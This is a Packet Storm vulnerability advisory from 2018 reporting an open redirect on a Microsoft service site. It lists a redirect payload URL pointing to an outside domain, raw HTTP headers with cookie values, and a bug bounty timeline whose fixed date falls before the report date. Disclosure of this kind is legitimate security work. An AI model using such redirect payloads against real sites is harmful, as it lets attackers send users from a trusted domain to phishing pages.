Microsoft Open Redirect

2018-06-05T00:00:00
ID PACKETSTORM:148059
Type packetstorm
Reporter Ismail Tasdelen
Modified 2018-06-05T00:00:00

Description

                                        
                                            `# Exploit Title: [ Open Redirect at Microsoft ]  
  
# Date: [ 28.05.2018 ]  
  
# Exploit Author: [ Ismail Tasdelen ]  
  
# Vendor Homepage: [ https://www.microsoft.com/ ]  
  
# Software : [ Microsoft Service Website ]  
  
# Software Version : [ 1.0.0 ]  
  
# Vulnerability : Open Redirect  
  
# CWE : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')  
  
# Referenes : https://cwe.mitre.org/data/definitions/601.html  
  
# Open Redirect Payload : redirect.html?referrerID=&src=msn&rurl=http://ismailtasdelen.me  
  
# Type: Webapps  
  
# PoC Video : https://www.youtube.com/watch?v=qKJZWrD6kyE  
  
# Test on : Kali Linux / Windows 10 - Google Chrome / Mozilla FireFox -- Last Version   
  
# Report Information : aMSRC Case 45689aCRM:0461050327  
  
# HTTP REQUEST HEADER :  
  
Request URL: https://dpa-fwl.microsoft.com/  
Request Method: GET  
Status Code: 404 Not Found  
Remote Address: 23.206.41.151:443  
Referrer Policy: no-referrer-when-downgrade  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate, br  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Cache-Control: max-age=0  
Connection: keep-alive  
Cookie: MUID=1108A71E7DDC60711EE8ACE37C7761DD; MC1=GUID=7411899aa2f5459d92a2e06820293a50&HASH=7411&LV=201805&V=4&LU=1527484623502; MS0=d0c78c48ac1b42e38cb009509aeed269; AMCVS_EA76ADE95776D2EC7F000101%40AdobeOrg=1; AMCV_EA76ADE95776D2EC7F000101%40AdobeOrg=-894706358%7CMCIDTS%7C17680%7CMCMID%7C71837383169482853811344079266943525630%7CMCAAMLH-1528089421%7C6%7CMCAAMB-1528089421%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCCIDH%7C-467936784%7CMCOPTOUT-1527491821s%7CNONE%7CMCSYNCSOP%7C411-17687%7CvVersion%7C2.3.0; AAMC_mscom_0=AMSYNCSOP%7C411-17687  
Host: dpa-fwl.microsoft.com  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36  
  
# HTTP RESPONSE HEADER :  
  
Connection: keep-alive  
Content-Length: 223  
Content-Type: application/xml  
Date: Mon, 28 May 2018 05:18:04 GMT  
Server: Blob Service Version 1.0 Microsoft-HTTPAPI/2.0  
x-ms-request-id: 35d526a9-201e-0076-1343-f68622000000  
  
# Bug Bounty Time Line :  
  
Report Date : 5-28-2018  
Triage Date : 5-28-2018  
Fixed Date : 5-06-2018  
  
# You want to follow my activity ?  
  
https://www.linkedin.com/in/ismailtasdelen  
https://github.com/ismailtasdelen  
https://twitter.com/ismailtsdln  
https://packetstormsecurity.com/user/ismailtasdelen/  
`